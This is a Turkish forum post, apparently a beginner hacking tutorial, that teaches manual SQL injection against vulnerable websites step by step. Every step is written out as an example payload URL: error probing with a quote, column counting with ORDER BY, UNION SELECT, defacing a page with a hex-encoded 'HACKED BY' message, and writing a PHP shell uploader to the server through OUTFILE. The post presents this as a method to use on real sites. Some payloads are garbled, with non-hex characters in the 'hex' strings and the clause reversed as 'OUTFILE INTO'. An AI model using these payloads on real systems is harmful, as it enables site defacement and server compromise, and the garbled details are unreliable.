Başlangıcıma Özel Konudur

Beyler Bu konumda sql açıklı sitelerde panele girmeden shell upload etmeyi anlatıcam. bu zamana kadar sql olayını sadece havij veya sqlmap'ten ibaret biliyordunuz. Yok işte sitenin admin panelini bulucaz. Ondan sonra md5i kırıcaz. Sitede sql açığı tarayacaz. Öyle yapıcaz böyle yapıcaz bilmem ne.

Bunlara gerek yok. Tek gerekli olan şey sitede sql açığı olması.

NOT: HER SİTEDE İŞE YARAMIYOR.

İlk herkesin bildiği gibi (') işareti koyup hata verdirmemiz gerekir.

İşareti koyduk ve ekrana "AT LİNE 1" gibi bir hata geldi.

Buralar herkesin bildiği şeyler.

Şimdi bu hatayı fixlememiz gerekiyor. Bundan dolayı

-- - veya -- + komutunu kullanabilirsiniz. Not: farklı komutlarda var araştırın.

sitenin sonuna fix kodunu yazalım.

Örnek :

https://site.com/***/index.php?id=1' -- +

Bu fix kodunu yazdığımız zaman ekrandaki "at line 6" hatası gidecektir.

Şimdi sitede kaç kolon var bunu ölçeceğiz. Bunu ORDER+BY komutuyla yapıcaz.

Örnek:

https://site.com/***/index.php?id=1'+ORDER+BY+1 -- +

şimdi diyorsunuz neden order by komutunun yanına 1 yazdık. Siz o sayıyı ekranda hata alana kadar yükselteceksiniz.

Mesela ORDER+BY+5 e kadar yükselttiniz hata yok. Ama 6 yazdınız hata aldınız. Demektir ki sitede 5 kolon var.

Şimdi kolon sayımızı bulduk. 5 kolon var şimdide bu 5 kolondan hangileri aktif halde hangileri iş yapar bunu görücez.

Order by komutlarını falan url sonundan silin.

Bu sefer kullanacağımız komut UNION+ALL+SELECT komutu.

Bu komut sayesinde bulduğumuz 5 kolondan hangileri aktif ve işimize yarar onları bulucaz.

Örnek:

https://site.com/***/index.php?id=1'+UNION+SELECT+1,2,3,4,5 -- +

Evet... Neden 5 e kadar yazdığımı tahmin edebiliyorsunuzdur. Çünkü 5 kolunumuz vardı.

Enter tuşuna bastığınızda hiçbir sonuç almıyacaksınız. Sebebi ise id değerinin başına - koymanız gerekir. index.php?id=-1 olarak ayarlayacağız.

Örnek:

https://site.com/***/index.php?id=-1'+UNION+SELECT+1,2,3,4,5 -- +

Tamam şimdi bu şekilde giriş yaptığınız zaman ekranda bazı numaralar göreceksiniz..

Diyelim ekranda 3 ve 5 numarasını görüyorsunuz.

Bu şu demek, 3 ve 5 aktif kolonlardır. Yani bizim işimize yarayacak olan kolonlar 3. Kolon ve 5. Kolondur.

Dilerseniz siteyi şimdi deface edebilirsiniz ama devan ederseniz siteye shell sokabilirsiniz.

Örneğin; deface mi etmek istiyorsunuz ?

"HACKED BY Cyber Security" bu yazıyı hex koduna çevirin.(internette hex encoder yazarsanız çıkar) Tamam mesela hex kodunux bu; 62k6k2nd7271jrld27 Şimdi bu kodun başına 0x koyun. 0x62k6k2nd7271jrld27 bu şekil olacak şekilde 3. Kolon veya 5. Kolona yerleştirin. Ben 5. Kolona yerlestiricem.

Örnek:

https://site.com/***/index.php?id=-1'+UNION+SELECT+1,2,3,4,0x62k6k2nd7271jrld27 -- +

Üstte gördüğünüz gibi 5. Kolona yerlestirmek istediğim için 5 sayısını silip onum yerine hex kodlarımı yapıstırdım.

Şimdi böyle yaptınız ve Ekranda "HACKED BY NİCKİNİZ" yazıyor. Bu şekilde deface ettiniz.

Peki ya shell upload etmek istersek ne yapıcaz ?

Shell kodumuzu da hex koduna çeviricez ama shell kodları çok fazla karakter olduğu işin sıkıntı çıkarabilir.

ShellUploader.php diye bir shell var az karakterden oluşturuyor ve bunun sayesinde shell upload edebiliorsun.

Bu shell uploeder php nin kodlarını hex koda çevirin ve başına 0x koyarak boş bir kolona yerleştirin. Ama bitti mi ? -bitmedi

Shelli nereye upload edeceğinizi bilmeniz lazım

Bir sitede sql açığı varken yüksek ihtimalle /home/user/public_html/***/index.php Gibi size yolu gösterir.

Şimdi biz Shell upload etmek bide bize upload kodu lazım. OUTFILE INTO komutuyla upload edebiliriz.

Örnek:

https://site.com/***/index.php?id=-1'+UNION+SELECT+1,2,3,4,0xoö72lsj27kejdı2ekdı72mdk OUTFILE INTO '/home/user/public_html/***/shelluploader.php' -- +

bu komutu yazarak shelluploader.php olarak dosyayı oluşturduk.

Evet konum bukadardı giriş için uygun olduğunu düşündüm selametle kalın.